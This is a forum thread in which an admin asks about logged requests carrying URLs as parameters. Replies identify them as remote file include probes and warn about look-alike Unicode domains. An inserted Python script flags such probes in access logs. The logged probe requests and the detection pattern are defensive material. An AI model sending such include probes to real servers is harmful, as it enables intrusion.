url attack ?

Status
Not open for further replies.

mistral9999

IS-IT--Management
Feb 5, 2008
1
US
I included a section of our server log below. It seems like they are inserting URLs into our URLs as parameters. For example,

/order/splist.do?m=5 (this is normal)
/order/splist.do?m= some url here


What is the purpose of this, and how can we prevent it? We do validation and error-checking on our parameters so they are ignored by the application server.

Thank you.
Matt


The following is from our logs:

192.168.111.2 - - [05/Feb/2008:01:51:20 -0500] "GET /order/splist.do?m=http%3A%2F%2F HTTP/1.0" 302 431
192.168.111.2 - - [05/Feb/2008:01:51:23 -0500] "GET /order/splist.do?m=http%3A%2F%2F HTTP/1.0" 302 431
192.168.111.2 - - [05/Feb/2008:01:51:24 -0500] "GET /cust/u/show.do?dir=http%3A%2F%2F HTTP/1.0" 302 431
 
This looks more like an attack than anything else. They are attempting an include, which basically tells your server to go to that site and download malicious content. As long as your software is up to date (this isn't always the case, though; you should verify with your vendor), file includes should not be a problem.
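
Added example, not part of the original thread or written by any poster: a Python sketch that scans access-log lines in the format quoted above and flags query parameters whose decoded value starts with a URL, which is the include-probe pattern described in the reply. The names `find_url_params` and `fully_decode`, the last two sample lines, and the 192.0.2.10 address are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+')
# Decoded value that begins with "scheme://" or a scheme-relative "//"
URL_VALUE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253A), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_url_params(lines):
    """Return one finding per query parameter whose decoded value looks like a URL."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a request line in this format
        target = urlsplit(m["target"])
        # parse_qsl performs the first percent-decoding pass
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if URL_VALUE.match(fully_decode(value)):
                findings.append({"client": m["client"], "time": m["time"],
                                 "path": target.path, "param": name,
                                 "status": int(m["status"])})
    return findings

SAMPLE_LOG = [
    # First three lines are the ones quoted in the post (URL elided as posted)
    '192.168.111.2 - - [05/Feb/2008:01:51:20 -0500] "GET /order/splist.do?m=http%3A%2F%2F HTTP/1.0" 302 431',
    '192.168.111.2 - - [05/Feb/2008:01:51:23 -0500] "GET /order/splist.do?m=http%3A%2F%2F HTTP/1.0" 302 431',
    '192.168.111.2 - - [05/Feb/2008:01:51:24 -0500] "GET /cust/u/show.do?dir=http%3A%2F%2F HTTP/1.0" 302 431',
    # Constructed lines: a normal request and a double-encoded variant
    '192.0.2.10 - - [05/Feb/2008:01:52:00 -0500] "GET /order/splist.do?m=5 HTTP/1.0" 200 1024',
    '192.0.2.10 - - [05/Feb/2008:01:52:05 -0500] "GET /order/splist.do?m=http%253A%252F%252F HTTP/1.0" 302 431',
]

if __name__ == "__main__":
    for finding in find_url_params(SAMPLE_LOG):
        print(finding)
```

Each finding keeps the response status, so a reviewer can see how the application answered each flagged request.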
 
Expect to see more of these types of attacks as the core DNS servers get updated to use Unicode domain names.

There are many characters in Unicode that visually look like their Roman equivalents, but have entirely separate codepoints.

So people may send you normal-looking URLs which actually map back to their malware servers.

Chip H.


____________________________________________________________________
If you want to get the best response to a question, please read FAQ222-2244 first
 